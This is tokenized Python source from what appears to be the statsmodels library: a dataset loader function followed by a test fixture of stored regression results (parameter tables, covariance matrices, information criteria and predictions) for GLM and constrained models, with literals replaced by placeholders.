<s> """<STR_LIT>""" <EOL> __docformat__ = '<STR_LIT>' <EOL> COPYRIGHT = """<STR_LIT>""" <EOL> TITLE = __doc__ <EOL> SOURCE = """<STR_LIT>""" <EOL> DESCRSHORT = """<STR_LIT>""" <EOL> DESCRLONG = """<STR_LIT>""" <EOL> NOTE = """<STR_LIT>""" <EOL> from numpy import recfromtxt , column_stack , array <EOL> from statsmodels . datasets import utils as du <EOL> from os . path import dirname , abspath <EOL> def load ( ) : <EOL> """<STR_LIT>""" <EOL> data = _get_data ( ) <EOL> return du . process_recarray ( data , endog_idx = <NUM_LIT:0> , dtype = float ) <EOL> def load_pandas ( ) : <EOL> """<STR_LIT>""" <EOL> data = _get_data ( ) <EOL> return du . process_recarray_pandas ( data , endog_idx = <NUM_LIT:0> , dtype = float ) <EOL> def _get_data ( ) : <EOL> filepath = dirname ( abspath ( __file__ ) ) <EOL> with open ( filepath + '<STR_LIT>' , '<STR_LIT:rb>' ) as f : <EOL> data = recfromtxt ( f , delimiter = "<STR_LIT:U+002C>" , <EOL> names = True , dtype = float , usecols = ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> ) ) <EOL> return data </s>
<s> import numpy as np <EOL> est = dict ( <EOL> k_eq_model = <NUM_LIT:0> , <EOL> phi = <NUM_LIT:1> , <EOL> vf = <NUM_LIT:1> , <EOL> df = <NUM_LIT> , <EOL> df_m = <NUM_LIT:3> , <EOL> power = <NUM_LIT:0> , <EOL> canonical = <NUM_LIT:1> , <EOL> rank = <NUM_LIT:4> , <EOL> aic = <NUM_LIT> , <EOL> rc = <NUM_LIT:0> , <EOL> p = <NUM_LIT> , <EOL> chi2 = <NUM_LIT> , <EOL> ll = - <NUM_LIT> , <EOL> k_autoCns = <NUM_LIT:0> , <EOL> converged = <NUM_LIT:1> , <EOL> k_dv = <NUM_LIT:1> , <EOL> k_eq = <NUM_LIT:1> , <EOL> k = <NUM_LIT:4> , <EOL> ic = <NUM_LIT:3> , <EOL> N = <NUM_LIT:32> , <EOL> nbml = <NUM_LIT:0> , <EOL> bic = - <NUM_LIT> , <EOL> dispers_ps = <NUM_LIT> , <EOL> deviance_ps = <NUM_LIT> , <EOL> dispers_p = <NUM_LIT> , <EOL> deviance_p = <NUM_LIT> , <EOL> dispers_s = <NUM_LIT> , <EOL> deviance_s = <NUM_LIT> , <EOL> dispers = <NUM_LIT> , <EOL> deviance = <NUM_LIT> , <EOL> cmdline = "<STR_LIT>" , <EOL> cmd = "<STR_LIT>" , <EOL> predict = "<STR_LIT>" , <EOL> marginsnotok = "<STR_LIT>" , <EOL> marginsok = "<STR_LIT:default>" , <EOL> hac_lag = "<STR_LIT>" , <EOL> vcetype = "<STR_LIT>" , <EOL> vce = "<STR_LIT>" , <EOL> linkt = "<STR_LIT>" , <EOL> linkf = "<STR_LIT>" , <EOL> varfunct = "<STR_LIT>" , <EOL> varfuncf = "<STR_LIT>" , <EOL> opt1 = "<STR_LIT>" , <EOL> oim = "<STR_LIT>" , <EOL> a = "<STR_LIT:1>" , <EOL> m = "<STR_LIT:1>" , <EOL> varfunc = "<STR_LIT>" , <EOL> link = "<STR_LIT>" , <EOL> chi2type = "<STR_LIT>" , <EOL> opt = "<STR_LIT>" , <EOL> title = "<STR_LIT>" , <EOL> user = "<STR_LIT>" , <EOL> crittype = "<STR_LIT>" , <EOL> ml_method = "<STR_LIT>" , <EOL> singularHmethod = "<STR_LIT>" , <EOL> technique = "<STR_LIT>" , <EOL> which = "<STR_LIT>" , <EOL> depvar = "<STR_LIT>" , <EOL> properties = "<STR_LIT>" , <EOL> ) <EOL> params_table = np . array ( [ <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , np . nan , <NUM_LIT> , <EOL> <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , np . nan , <EOL> <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> np . nan , <NUM_LIT> , <NUM_LIT:0> , - <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , np . nan , <NUM_LIT> , <NUM_LIT:0> <EOL> ] ) . reshape ( <NUM_LIT:4> , <NUM_LIT:9> ) <EOL> params_table_colnames = '<STR_LIT>' . split ( ) <EOL> params_table_rownames = '<STR_LIT>' . split ( ) <EOL> cov = np . array ( [ <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> <EOL> ] ) . reshape ( <NUM_LIT:4> , <NUM_LIT:4> ) <EOL> cov_colnames = '<STR_LIT>' . split ( ) <EOL> cov_rownames = '<STR_LIT>' . split ( ) <EOL> infocrit = np . array ( [ <EOL> <NUM_LIT:32> , np . nan , - <NUM_LIT> , <NUM_LIT:4> , <EOL> <NUM_LIT> , <NUM_LIT> ] ) <EOL> infocrit_colnames = '<STR_LIT>' . split ( ) <EOL> infocrit_rownames = '<STR_LIT:.>' . split ( ) <EOL> class Bunch ( dict ) : <EOL> def __init__ ( self , ** kw ) : <EOL> dict . __init__ ( self , kw ) <EOL> self . __dict__ = self <EOL> for i , att in enumerate ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) : <EOL> self [ att ] = self . params_table [ : , i ] <EOL> results_noconstraint = Bunch ( <EOL> params_table = params_table , <EOL> params_table_colnames = params_table_colnames , <EOL> params_table_rownames = params_table_rownames , <EOL> cov = cov , <EOL> cov_colnames = cov_colnames , <EOL> cov_rownames = cov_rownames , <EOL> infocrit = infocrit , <EOL> infocrit_colnames = infocrit_colnames , <EOL> infocrit_rownames = infocrit_rownames , <EOL> ** est <EOL> ) <EOL> est = dict ( <EOL> k_eq_model = <NUM_LIT:0> , <EOL> phi = <NUM_LIT:1> , <EOL> vf = <NUM_LIT:1> , <EOL> df = <NUM_LIT> , <EOL> df_m = <NUM_LIT:3> , <EOL> power = <NUM_LIT:0> , <EOL> canonical = <NUM_LIT:1> , <EOL> rank = <NUM_LIT:4> , <EOL> aic = <NUM_LIT> , <EOL> rc = <NUM_LIT:0> , <EOL> p = <NUM_LIT> , <EOL> chi2 = <NUM_LIT> , <EOL> ll = - <NUM_LIT> , <EOL> k_autoCns = <NUM_LIT:0> , <EOL> converged = <NUM_LIT:1> , <EOL> k_dv = <NUM_LIT:1> , <EOL> k_eq = <NUM_LIT:1> , <EOL> k = <NUM_LIT:4> , <EOL> ic = <NUM_LIT:3> , <EOL> N = <NUM_LIT:32> , <EOL> nbml = <NUM_LIT:0> , <EOL> bic = - <NUM_LIT> , <EOL> dispers_ps = <NUM_LIT> , <EOL> deviance_ps = <NUM_LIT> , <EOL> dispers_p = <NUM_LIT> , <EOL> deviance_p = <NUM_LIT> , <EOL> dispers_s = <NUM_LIT> , <EOL> deviance_s = <NUM_LIT> , <EOL> dispers = <NUM_LIT> , <EOL> deviance = <NUM_LIT> , <EOL> cmdline = "<STR_LIT>" , <EOL> cmd = "<STR_LIT>" , <EOL> predict = "<STR_LIT>" , <EOL> marginsnotok = "<STR_LIT>" , <EOL> marginsok = "<STR_LIT:default>" , <EOL> hac_lag = "<STR_LIT>" , <EOL> vcetype = "<STR_LIT>" , <EOL> vce = "<STR_LIT>" , <EOL> linkt = "<STR_LIT>" , <EOL> linkf = "<STR_LIT>" , <EOL> varfunct = "<STR_LIT>" , <EOL> varfuncf = "<STR_LIT>" , <EOL> opt1 = "<STR_LIT>" , <EOL> oim = "<STR_LIT>" , <EOL> a = "<STR_LIT:1>" , <EOL> m = "<STR_LIT:1>" , <EOL> varfunc = "<STR_LIT>" , <EOL> link = "<STR_LIT>" , <EOL> chi2type = "<STR_LIT>" , <EOL> opt = "<STR_LIT>" , <EOL> title = "<STR_LIT>" , <EOL> user = "<STR_LIT>" , <EOL> crittype = "<STR_LIT>" , <EOL> ml_method = "<STR_LIT>" , <EOL> singularHmethod = "<STR_LIT>" , <EOL> technique = "<STR_LIT>" , <EOL> which = "<STR_LIT>" , <EOL> depvar = "<STR_LIT>" , <EOL> properties = "<STR_LIT>" , <EOL> ) <EOL> params_table = np . array ( [ <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , np . nan , <NUM_LIT> , <EOL> <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , np . nan , <EOL> <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> np . nan , <NUM_LIT> , <NUM_LIT:0> , - <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , np . nan , <NUM_LIT> , <NUM_LIT:0> <EOL> ] ) . reshape ( <NUM_LIT:4> , <NUM_LIT:9> ) <EOL> params_table_colnames = '<STR_LIT>' . split ( ) <EOL> params_table_rownames = '<STR_LIT>' . split ( ) <EOL> cov = np . array ( [ <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> <EOL> ] ) . reshape ( <NUM_LIT:4> , <NUM_LIT:4> ) <EOL> cov_colnames = '<STR_LIT>' . split ( ) <EOL> cov_rownames = '<STR_LIT>' . split ( ) <EOL> infocrit = np . array ( [ <EOL> <NUM_LIT:32> , np . nan , - <NUM_LIT> , <NUM_LIT:4> , <EOL> <NUM_LIT> , <NUM_LIT> ] ) <EOL> infocrit_colnames = '<STR_LIT>' . split ( ) <EOL> infocrit_rownames = '<STR_LIT:.>' . split ( ) <EOL> results_noconstraint_robust = Bunch ( <EOL> params_table = params_table , <EOL> params_table_colnames = params_table_colnames , <EOL> params_table_rownames = params_table_rownames , <EOL> cov = cov , <EOL> cov_colnames = cov_colnames , <EOL> cov_rownames = cov_rownames , <EOL> infocrit = infocrit , <EOL> infocrit_colnames = infocrit_colnames , <EOL> infocrit_rownames = infocrit_rownames , <EOL> ** est <EOL> ) <EOL> est = dict ( <EOL> k_eq_model = <NUM_LIT:0> , <EOL> phi = <NUM_LIT:1> , <EOL> vf = <NUM_LIT:1> , <EOL> df = <NUM_LIT> , <EOL> df_m = <NUM_LIT:2> , <EOL> power = <NUM_LIT:0> , <EOL> canonical = <NUM_LIT:1> , <EOL> rank = <NUM_LIT:3> , <EOL> aic = <NUM_LIT> , <EOL> rc = <NUM_LIT:0> , <EOL> p = <NUM_LIT> , <EOL> chi2 = <NUM_LIT> , <EOL> ll = - <NUM_LIT> , <EOL> k_autoCns = <NUM_LIT:0> , <EOL> converged = <NUM_LIT:1> , <EOL> k_dv = <NUM_LIT:1> , <EOL> k_eq = <NUM_LIT:1> , <EOL> k = <NUM_LIT:4> , <EOL> ic = <NUM_LIT:3> , <EOL> N = <NUM_LIT:32> , <EOL> nbml = <NUM_LIT:0> , <EOL> bic = - <NUM_LIT> , <EOL> dispers_ps = <NUM_LIT> , <EOL> deviance_ps = <NUM_LIT> , <EOL> dispers_p = <NUM_LIT> , <EOL> deviance_p = <NUM_LIT> , <EOL> dispers_s = <NUM_LIT> , <EOL> deviance_s = <NUM_LIT> , <EOL> dispers = <NUM_LIT> , <EOL> deviance = <NUM_LIT> , <EOL> cmdline = "<STR_LIT>" , <EOL> cmd = "<STR_LIT>" , <EOL> predict = "<STR_LIT>" , <EOL> marginsnotok = "<STR_LIT>" , <EOL> marginsok = "<STR_LIT:default>" , <EOL> hac_lag = "<STR_LIT>" , <EOL> vcetype = "<STR_LIT>" , <EOL> vce = "<STR_LIT>" , <EOL> linkt = "<STR_LIT>" , <EOL> linkf = "<STR_LIT>" , <EOL> varfunct = "<STR_LIT>" , <EOL> varfuncf = "<STR_LIT>" , <EOL> opt1 = "<STR_LIT>" , <EOL> oim = "<STR_LIT>" , <EOL> a = "<STR_LIT:1>" , <EOL> m = "<STR_LIT:1>" , <EOL> varfunc = "<STR_LIT>" , <EOL> link = "<STR_LIT>" , <EOL> chi2type = "<STR_LIT>" , <EOL> opt = "<STR_LIT>" , <EOL> title = "<STR_LIT>" , <EOL> user = "<STR_LIT>" , <EOL> crittype = "<STR_LIT>" , <EOL> ml_method = "<STR_LIT>" , <EOL> singularHmethod = "<STR_LIT>" , <EOL> technique = "<STR_LIT>" , <EOL> which = "<STR_LIT>" , <EOL> depvar = "<STR_LIT>" , <EOL> properties = "<STR_LIT>" , <EOL> ) <EOL> params_table = np . array ( [ <EOL> <NUM_LIT> , np . nan , np . nan , np . nan , <EOL> np . nan , np . nan , np . nan , <NUM_LIT> , <EOL> <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , np . nan , <EOL> <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> np . nan , <NUM_LIT> , <NUM_LIT:0> , - <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , np . nan , <NUM_LIT> , <NUM_LIT:0> <EOL> ] ) . reshape ( <NUM_LIT:4> , <NUM_LIT:9> ) <EOL> params_table_colnames = '<STR_LIT>' . split ( ) <EOL> params_table_rownames = '<STR_LIT>' . split ( ) <EOL> cov = np . array ( [ <EOL> <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <EOL> <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT:0> , - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> <EOL> ] ) . reshape ( <NUM_LIT:4> , <NUM_LIT:4> ) <EOL> cov_colnames = '<STR_LIT>' . split ( ) <EOL> cov_rownames = '<STR_LIT>' . split ( ) <EOL> infocrit = np . array ( [ <EOL> <NUM_LIT:32> , np . nan , - <NUM_LIT> , <NUM_LIT:3> , <EOL> <NUM_LIT> , <NUM_LIT> ] ) <EOL> infocrit_colnames = '<STR_LIT>' . split ( ) <EOL> infocrit_rownames = '<STR_LIT:.>' . split ( ) <EOL> results_constraint1 = Bunch ( <EOL> params_table = params_table , <EOL> params_table_colnames = params_table_colnames , <EOL> params_table_rownames = params_table_rownames , <EOL> cov = cov , <EOL> cov_colnames = cov_colnames , <EOL> cov_rownames = cov_rownames , <EOL> infocrit = infocrit , <EOL> infocrit_colnames = infocrit_colnames , <EOL> infocrit_rownames = infocrit_rownames , <EOL> ** est <EOL> ) <EOL> est = dict ( <EOL> k_eq_model = <NUM_LIT:0> , <EOL> phi = <NUM_LIT:1> , <EOL> vf = <NUM_LIT:1> , <EOL> df = <NUM_LIT> , <EOL> df_m = <NUM_LIT:2> , <EOL> power = <NUM_LIT:0> , <EOL> canonical = <NUM_LIT:1> , <EOL> rank = <NUM_LIT:3> , <EOL> aic = <NUM_LIT> , <EOL> rc = <NUM_LIT:0> , <EOL> p = <NUM_LIT> , <EOL> chi2 = <NUM_LIT> , <EOL> ll = - <NUM_LIT> , <EOL> k_autoCns = <NUM_LIT:0> , <EOL> converged = <NUM_LIT:1> , <EOL> k_dv = <NUM_LIT:1> , <EOL> k_eq = <NUM_LIT:1> , <EOL> k = <NUM_LIT:4> , <EOL> ic = <NUM_LIT:3> , <EOL> N = <NUM_LIT:32> , <EOL> nbml = <NUM_LIT:0> , <EOL> bic = - <NUM_LIT> , <EOL> dispers_ps = <NUM_LIT> , <EOL> deviance_ps = <NUM_LIT> , <EOL> dispers_p = <NUM_LIT> , <EOL> deviance_p = <NUM_LIT> , <EOL> dispers_s = <NUM_LIT> , <EOL> deviance_s = <NUM_LIT> , <EOL> dispers = <NUM_LIT> , <EOL> deviance = <NUM_LIT> , <EOL> cmdline = "<STR_LIT>" , <EOL> cmd = "<STR_LIT>" , <EOL> predict = "<STR_LIT>" , <EOL> marginsnotok = "<STR_LIT>" , <EOL> marginsok = "<STR_LIT:default>" , <EOL> hac_lag = "<STR_LIT>" , <EOL> vcetype = "<STR_LIT>" , <EOL> vce = "<STR_LIT>" , <EOL> linkt = "<STR_LIT>" , <EOL> linkf = "<STR_LIT>" , <EOL> varfunct = "<STR_LIT>" , <EOL> varfuncf = "<STR_LIT>" , <EOL> opt1 = "<STR_LIT>" , <EOL> oim = "<STR_LIT>" , <EOL> a = "<STR_LIT:1>" , <EOL> m = "<STR_LIT:1>" , <EOL> varfunc = "<STR_LIT>" , <EOL> link = "<STR_LIT>" , <EOL> chi2type = "<STR_LIT>" , <EOL> opt = "<STR_LIT>" , <EOL> title = "<STR_LIT>" , <EOL> user = "<STR_LIT>" , <EOL> crittype = "<STR_LIT>" , <EOL> ml_method = "<STR_LIT>" , <EOL> singularHmethod = "<STR_LIT>" , <EOL> technique = "<STR_LIT>" , <EOL> which = "<STR_LIT>" , <EOL> depvar = "<STR_LIT>" , <EOL> properties = "<STR_LIT>" , <EOL> ) <EOL> params_table = np . array ( [ <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , np . nan , <NUM_LIT> , <EOL> <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , np . nan , <EOL> <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> np . nan , <NUM_LIT> , <NUM_LIT:0> , - <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , np . nan , <NUM_LIT> , <NUM_LIT:0> <EOL> ] ) . reshape ( <NUM_LIT:4> , <NUM_LIT:9> ) <EOL> params_table_colnames = '<STR_LIT>' . split ( ) <EOL> params_table_rownames = '<STR_LIT>' . split ( ) <EOL> cov = np . array ( [ <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> <EOL> ] ) . reshape ( <NUM_LIT:4> , <NUM_LIT:4> ) <EOL> cov_colnames = '<STR_LIT>' . split ( ) <EOL> cov_rownames = '<STR_LIT>' . split ( ) <EOL> infocrit = np . array ( [ <EOL> <NUM_LIT:32> , np . nan , - <NUM_LIT> , <NUM_LIT:3> , <EOL> <NUM_LIT> , <NUM_LIT> ] ) <EOL> infocrit_colnames = '<STR_LIT>' . split ( ) <EOL> infocrit_rownames = '<STR_LIT:.>' . split ( ) <EOL> predict_mu = np . array ( [ <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> <EOL> ] ) <EOL> predict_mu_colnames = '<STR_LIT>' . split ( ) <EOL> predict_mu_rownames = '<STR_LIT>' . split ( ) <EOL> predict_linpred_std = np . array ( [ <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> <EOL> ] ) <EOL> predict_linpred_std_colnames = '<STR_LIT>' . split ( ) <EOL> predict_linpred_std_rownames = '<STR_LIT>' . split ( ) <EOL> predict_hat = np . array ( [ <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> <EOL> ] ) <EOL> predict_hat_colnames = '<STR_LIT>' . split ( ) <EOL> predict_hat_rownames = '<STR_LIT>' . split ( ) <EOL> results_constraint2 = Bunch ( <EOL> params_table = params_table , <EOL> params_table_colnames = params_table_colnames , <EOL> params_table_rownames = params_table_rownames , <EOL> cov = cov , <EOL> cov_colnames = cov_colnames , <EOL> cov_rownames = cov_rownames , <EOL> infocrit = infocrit , <EOL> infocrit_colnames = infocrit_colnames , <EOL> infocrit_rownames = infocrit_rownames , <EOL> predict_mu = predict_mu , <EOL> predict_mu_colnames = predict_mu_colnames , <EOL> predict_mu_rownames = predict_mu_rownames , <EOL> predict_linpred_std = predict_linpred_std , <EOL> predict_linpred_std_colnames = predict_linpred_std_colnames , <EOL> predict_linpred_std_rownames = predict_linpred_std_rownames , <EOL> predict_hat = predict_hat , <EOL> predict_hat_colnames = predict_hat_colnames , <EOL> predict_hat_rownames = predict_hat_rownames , <EOL> ** est <EOL> ) <EOL> est = dict ( <EOL> k_eq_model = <NUM_LIT:0> , <EOL> phi = <NUM_LIT:1> , <EOL> vf = <NUM_LIT:1> , <EOL> df = <NUM_LIT> , <EOL> df_m = <NUM_LIT:2> , <EOL> power = <NUM_LIT:0> , <EOL> canonical = <NUM_LIT:1> , <EOL> rank = <NUM_LIT:3> , <EOL> aic = <NUM_LIT> , <EOL> rc = <NUM_LIT:0> , <EOL> p = <NUM_LIT> , <EOL> chi2 = <NUM_LIT> , <EOL> ll = - <NUM_LIT> , <EOL> k_autoCns = <NUM_LIT:0> , <EOL> converged = <NUM_LIT:1> , <EOL> k_dv = <NUM_LIT:1> , <EOL> k_eq = <NUM_LIT:1> , <EOL> k = <NUM_LIT:4> , <EOL> ic = <NUM_LIT:3> , <EOL> N = <NUM_LIT:32> , <EOL> nbml = <NUM_LIT:0> , <EOL> bic = - <NUM_LIT> , <EOL> dispers_ps = <NUM_LIT> , <EOL> deviance_ps = <NUM_LIT> , <EOL> dispers_p = <NUM_LIT> , <EOL> deviance_p = <NUM_LIT> , <EOL> dispers_s = <NUM_LIT> , <EOL> deviance_s = <NUM_LIT> , <EOL> dispers = <NUM_LIT> , <EOL> deviance = <NUM_LIT> , <EOL> cmdline = "<STR_LIT>" , <EOL> cmd = "<STR_LIT>" , <EOL> predict = "<STR_LIT>" , <EOL> marginsnotok = "<STR_LIT>" , <EOL> marginsok = "<STR_LIT:default>" , <EOL> hac_lag = "<STR_LIT>" , <EOL> vcetype = "<STR_LIT>" , <EOL> vce = "<STR_LIT>" , <EOL> linkt = "<STR_LIT>" , <EOL> linkf = "<STR_LIT>" , <EOL> varfunct = "<STR_LIT>" , <EOL> varfuncf = "<STR_LIT>" , <EOL> opt1 = "<STR_LIT>" , <EOL> oim = "<STR_LIT>" , <EOL> a = "<STR_LIT:1>" , <EOL> m = "<STR_LIT:1>" , <EOL> varfunc = "<STR_LIT>" , <EOL> link = "<STR_LIT>" , <EOL> chi2type = "<STR_LIT>" , <EOL> opt = "<STR_LIT>" , <EOL> title = "<STR_LIT>" , <EOL> user = "<STR_LIT>" , <EOL> crittype = "<STR_LIT>" , <EOL> ml_method = "<STR_LIT>" , <EOL> singularHmethod = "<STR_LIT>" , <EOL> technique = "<STR_LIT>" , <EOL> which = "<STR_LIT>" , <EOL> depvar = "<STR_LIT>" , <EOL> properties = "<STR_LIT>" , <EOL> ) <EOL> params_table = np . array ( [ <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , np . nan , <NUM_LIT> , <EOL> <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , np . nan , <EOL> <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> np . nan , <NUM_LIT> , <NUM_LIT:0> , - <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , np . nan , <NUM_LIT> , <NUM_LIT:0> <EOL> ] ) . reshape ( <NUM_LIT:4> , <NUM_LIT:9> ) <EOL> params_table_colnames = '<STR_LIT>' . split ( ) <EOL> params_table_rownames = '<STR_LIT>' . split ( ) <EOL> cov = np . array ( [ <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> <EOL> ] ) . reshape ( <NUM_LIT:4> , <NUM_LIT:4> ) <EOL> cov_colnames = '<STR_LIT>' . split ( ) <EOL> cov_rownames = '<STR_LIT>' . split ( ) <EOL> infocrit = np . array ( [ <EOL> <NUM_LIT:32> , np . nan , - <NUM_LIT> , <NUM_LIT:3> , <EOL> <NUM_LIT> , <NUM_LIT> ] ) <EOL> infocrit_colnames = '<STR_LIT>' . split ( ) <EOL> infocrit_rownames = '<STR_LIT:.>' . split ( ) <EOL> results_constraint2_robust = Bunch ( <EOL> params_table = params_table , <EOL> params_table_colnames = params_table_colnames , <EOL> params_table_rownames = params_table_rownames , <EOL> cov = cov , <EOL> cov_colnames = cov_colnames , <EOL> cov_rownames = cov_rownames , <EOL> infocrit = infocrit , <EOL> infocrit_colnames = infocrit_colnames , <EOL> infocrit_rownames = infocrit_rownames , <EOL> ** est <EOL> ) <EOL> est = dict ( <EOL> N_cds = <NUM_LIT:0> , <EOL> N_cdf = <NUM_LIT:0> , <EOL> p = <NUM_LIT> , <EOL> chi2 = <NUM_LIT> , <EOL> df_m = <NUM_LIT:2> , <EOL> k_eq_model = <NUM_LIT:1> , <EOL> ll = - <NUM_LIT> , <EOL> k_autoCns = <NUM_LIT:0> , <EOL> rc = <NUM_LIT:0> , <EOL> converged = <NUM_LIT:1> , <EOL> k_dv = <NUM_LIT:1> , <EOL> k_eq = <NUM_LIT:1> , <EOL> k = <NUM_LIT:4> , <EOL> ic = <NUM_LIT:5> , <EOL> N = <NUM_LIT:32> , <EOL> rank = <NUM_LIT:3> , <EOL> cmdline = "<STR_LIT>" , <EOL> cmd = "<STR_LIT>" , <EOL> estat_cmd = "<STR_LIT>" , <EOL> predict = "<STR_LIT>" , <EOL> marginsnotok = "<STR_LIT>" , <EOL> title = "<STR_LIT>" , <EOL> chi2type = "<STR_LIT>" , <EOL> opt = "<STR_LIT>" , <EOL> vce = "<STR_LIT>" , <EOL> user = "<STR_LIT>" , <EOL> crittype = "<STR_LIT>" , <EOL> ml_method = "<STR_LIT>" , <EOL> singularHmethod = "<STR_LIT>" , <EOL> technique = "<STR_LIT>" , <EOL> which = "<STR_LIT>" , <EOL> depvar = "<STR_LIT>" , <EOL> properties = "<STR_LIT>" , <EOL> ) <EOL> params_table = np . array ( [ <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> 